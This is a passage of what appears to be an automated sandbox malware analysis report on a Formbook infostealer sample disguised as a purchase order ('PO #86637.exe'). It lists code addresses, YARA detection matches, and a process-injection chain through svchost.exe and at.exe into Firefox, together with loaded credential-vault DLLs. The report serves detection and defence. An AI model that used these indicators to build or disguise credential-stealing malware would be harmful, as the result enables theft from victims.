            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EF0CC1_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034470C01_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F70E91_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF0E01_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF7B01_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034856301_2_03485630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F16CC1_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F75711_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035095C31_2_035095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DD5B01_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034314601_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF43F1_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFB761_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B5BF01_2_034B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347DBF91_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345FB801_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFA491_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F7A461_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B3A6C1_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EDAC61_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DDAAC1_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03485AA01_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E1AA31_2_034E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034499501_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345B9501_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D59101_2_034D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AD8001_2_034AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034438E01_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFF091_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03441F921_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFFB11_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03449EB01_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03443D401_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F1D5A1_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F7D731_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345FDC01_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B9C321_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFCF21_2_034FFCF2
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03BA03E63_2_03BA03E6
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AEE3F03_2_03AEE3F0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9A3523_2_03B9A352
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B602C03_2_03B602C0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B802743_2_03B80274
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03BA01AA3_2_03BA01AA
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B941A23_2_03B941A2
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B981CC3_2_03B981CC
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AD01003_2_03AD0100
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B7A1183_2_03B7A118
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B681583_2_03B68158
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B720003_2_03B72000
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03ADC7C03_2_03ADC7C0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AE07703_2_03AE0770
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B047503_2_03B04750
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AFC6E03_2_03AFC6E0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03BA05913_2_03BA0591
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AE05353_2_03AE0535
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B8E4F63_2_03B8E4F6
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B844203_2_03B84420
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B924463_2_03B92446
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B96BD73_2_03B96BD7
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9AB403_2_03B9AB40
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03ADEA803_2_03ADEA80
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AE29A03_2_03AE29A0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03BAA9A63_2_03BAA9A6
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AF69623_2_03AF6962
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AC68B83_2_03AC68B8
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B0E8F03_2_03B0E8F0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AE28403_2_03AE2840
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AEA8403_2_03AEA840
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B5EFA03_2_03B5EFA0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AD2FC83_2_03AD2FC8
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B00F303_2_03B00F30
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B82F303_2_03B82F30
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B22F283_2_03B22F28
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B54F403_2_03B54F40
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9CE933_2_03B9CE93
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AF2E903_2_03AF2E90
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9EEDB3_2_03B9EEDB
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9EE263_2_03B9EE26
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AE0E593_2_03AE0E59
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AF8DBF3_2_03AF8DBF
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03ADADE03_2_03ADADE0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B7CD1F3_2_03B7CD1F
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AEAD003_2_03AEAD00
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B80CB53_2_03B80CB5
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AD0CF23_2_03AD0CF2
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AE0C003_2_03AE0C00
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B2739A3_2_03B2739A
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9132D3_2_03B9132D
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03ACD34C3_2_03ACD34C
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AE52A03_2_03AE52A0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B812ED3_2_03B812ED
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AFD2F03_2_03AFD2F0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AFB2C03_2_03AFB2C0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AEB1B03_2_03AEB1B0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03BAB16B3_2_03BAB16B
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B1516C3_2_03B1516C
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03ACF1723_2_03ACF172
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B970E93_2_03B970E9
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9F0E03_2_03B9F0E0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AE70C03_2_03AE70C0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B8F0CC3_2_03B8F0CC
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9F7B03_2_03B9F7B0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B916CC3_2_03B916CC
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B256303_2_03B25630
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B7D5B03_2_03B7D5B0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B975713_2_03B97571
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9F43F3_2_03B9F43F
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AD14603_2_03AD1460
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AFFB803_2_03AFFB80
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B55BF03_2_03B55BF0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B1DBF93_2_03B1DBF9
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9FB763_2_03B9FB76
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B25AA03_2_03B25AA0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B7DAAC3_2_03B7DAAC
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B81AA33_2_03B81AA3
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B8DAC63_2_03B8DAC6
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B53A6C3_2_03B53A6C
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9FA493_2_03B9FA49
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B97A463_2_03B97A46
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B759103_2_03B75910
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AE99503_2_03AE9950
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AFB9503_2_03AFB950
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AE38E03_2_03AE38E0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B4D8003_2_03B4D800
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9FFB13_2_03B9FFB1
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AE1F923_2_03AE1F92
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AA3FD23_2_03AA3FD2
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AA3FD53_2_03AA3FD5
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9FF093_2_03B9FF09
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AE9EB03_2_03AE9EB0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AFFDC03_2_03AFFDC0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B97D733_2_03B97D73
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B91D5A3_2_03B91D5A
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AE3D403_2_03AE3D40
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B9FCF23_2_03B9FCF2
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B59C323_2_03B59C32
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03211A603_2_03211A60
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_0320CB803_2_0320CB80
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_0320C9603_2_0320C960
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_0320C9573_2_0320C957
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_0320AC003_2_0320AC00
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_032132EC3_2_032132EC
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_032132F03_2_032132F0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_032151103_2_03215110
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_0322B7803_2_0322B780
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_037DE5533_2_037DE553
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_037DE4383_2_037DE438
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_037DCBE33_2_037DCBE3
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_037DD9583_2_037DD958
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_037DE8EC3_2_037DE8EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 107 times
            Source: C:\Windows\SysWOW64\at.exeCode function: String function: 03B4EA12 appears 86 times
            Source: C:\Windows\SysWOW64\at.exeCode function: String function: 03B27E54 appears 99 times
            Source: C:\Windows\SysWOW64\at.exeCode function: String function: 03ACB970 appears 262 times
            Source: C:\Windows\SysWOW64\at.exeCode function: String function: 03B15130 appears 58 times
            Source: C:\Windows\SysWOW64\at.exeCode function: String function: 03B5F290 appears 103 times
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: String function: 00445AE0 appears 65 times
            Source: PO #86637.exe, 00000000.00000003.1697872476.00000000047E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO #86637.exe
            Source: PO #86637.exe, 00000000.00000003.1696781527.000000000498D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO #86637.exe
            Source: PO #86637.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/9
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\PO #86637.exeFile created: C:\Users\user\AppData\Local\Temp\cuniliJump to behavior
            Source: PO #86637.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO #86637.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: at.exe, 00000003.00000003.2137677817.00000000034D2000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000003.2136592454.00000000034D2000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3546898419.00000000034D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO #86637.exeVirustotal: Detection: 50%
            Source: PO #86637.exeReversingLabs: Detection: 73%
            Source: C:\Users\user\Desktop\PO #86637.exeFile read: C:\Users\user\Desktop\PO #86637.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PO #86637.exe "C:\Users\user\Desktop\PO #86637.exe"
            Source: C:\Users\user\Desktop\PO #86637.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO #86637.exe"
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeProcess created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"
            Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO #86637.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO #86637.exe"Jump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeProcess created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
